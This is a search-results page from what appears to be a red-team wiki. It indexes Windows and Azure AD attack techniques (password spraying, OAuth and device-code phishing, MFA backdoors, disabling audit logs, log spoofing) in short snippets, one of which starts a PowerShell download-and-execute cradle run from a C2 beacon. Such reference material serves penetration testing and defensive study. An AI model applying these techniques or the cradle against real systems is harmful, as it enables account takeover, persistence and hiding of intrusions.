Search Results

31 total results found

Persistence

Windows Attacks and Enumerations

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Recon

Windows Attacks and Enumerations

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

Defense Evasion

Windows Attacks and Enumerations

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Useful links

Azure AD (AAD)

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

Overview of Azure & M365

Azure AD (AAD)

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant, which represents a company (like a domain ...

Enumerate Users and Domains

Azure AD (AAD)

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

AAD Enumeration

Post-exploitation Reconnaissance

Azure AD (AAD)

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...

AAD Enumeration

Password Spraying M365

Azure AD (AAD)

This attack is not complex as it only consists of "guessing" a user's password, but there are still some precautions we want to take: Slow spraying to avoid account lockouts Rotating IPs via proxies and / or VPNs to avoid IP blacklisting and to bypass location...

AAD Initial Access

OAuth 2.0 Abuse

Azure AD (AAD)

OAuth is a protocol that allows third-party applications to access services with access tokens, avoiding the disclosure of the user's credentials. What we can do as an attacker is create a malicious OAuth app to coerce users into granting the application acces...

AAD Initial Access

Abusing Device Code Authentication

Azure AD (AAD)

Device Code Authentication allows an attacker to compromise an AAD / M365 account just like OAuth Abuse, but it's generally harder to detect / set up and doesn't require any input from the victim. The downside to this technique is that the device codes are valid for only a ...

AAD Initial Access

Abusing Cloud Administrator Role

Azure AD (AAD)

In this section we'll tackle an attack scenario that sees us compromising a Cloud Administrator account and wanting to get access to an application we don't have access to. This application has a Contributor RBAC role to the subscription so we'll end up assign...

AAD Privilege Escalation

Abusing User Administrator Role

Azure AD (AAD)

Just like for the Cloud Administrator section, we'll walk through a small attack scenario which starts with us compromising a User Administrator account. Let's say there is a credential vault in a subscription we are not part of and we want to get to that: what...

AAD Privilege Escalation

AAD Federated Backdoor

Azure AD (AAD)

The gist of this persistence technique is creating a malicious domain inside a target tenant and using the newly-created domain to impersonate any user from the tenant in M365. This method requires a high-privilege account to be compromised (or gained) such as D...

AAD Persistence

Malicious MFA Takeover

Azure AD (AAD)

This technique is pretty simple as it only consists of "backdooring" user accounts that don't have MFA set up; if an attacker controls one of these accounts it's possible to register new devices under that user's account. A simple way to get the MFA status of ...

AAD Persistence

Service Principal Abuse

Azure AD (AAD)

This persistence method consists of backdooring Azure applications, leveraging the permissions of an SP account to gain SSO access to the environment with the permissions of those applications without the need for credentials. The main benefits of attacking SP ac...

AAD Persistence

Compromising Azure Blobs and Storage Accounts

Azure AD (AAD)

Storage Accounts are high-value targets in a tenant if an attacker is looking to exfiltrate sensitive data. What we'll focus on in this section is a common misconfiguration that exposes access keys for the storage account itself allowing an attacker to downloa...

AAD Persistence

Malicious Device Join

Azure AD (AAD)

This technique allows an attacker to bypass Conditional Access Policies based on device ownership. Since devices are identified with certificates created during the registration process, all we need is access to a user account that can register a new device that can be se...

AAD Persistence

Disabling Auditing (Unified Audit Logs)

Azure AD (AAD)

Azure's audit logs provide the vast majority of logging in the tenant and can be easily used to figure out what has been compromised and how the attack was carried out, but if we manage to compromise an account with the Compliance Administrator role we can disa...

AAD Defense Evasion

Spoofing Azure Sign-In Logs

Azure AD (AAD)

In hybrid environments, every attacker with local administrator access can spoof AAD Sign-In events and every attacker with Global Administrator permissions can register fake agents to AAD. This technique can both be used to remove tracks and IOCs but also to ...

AAD Defense Evasion

Registering Fake Agents for Log Spoofing

Azure AD (AAD)

We talked about Spoofing AAD Logon logs as an ADFS administrator in [[15 - Spoofing Azure Sign-In Logs]]; now we'll see how it's possible to do the same as a Global Administrator on the AAD side. As a Global Admin we can register our own AAD Connect Health agen...

AAD Defense Evasion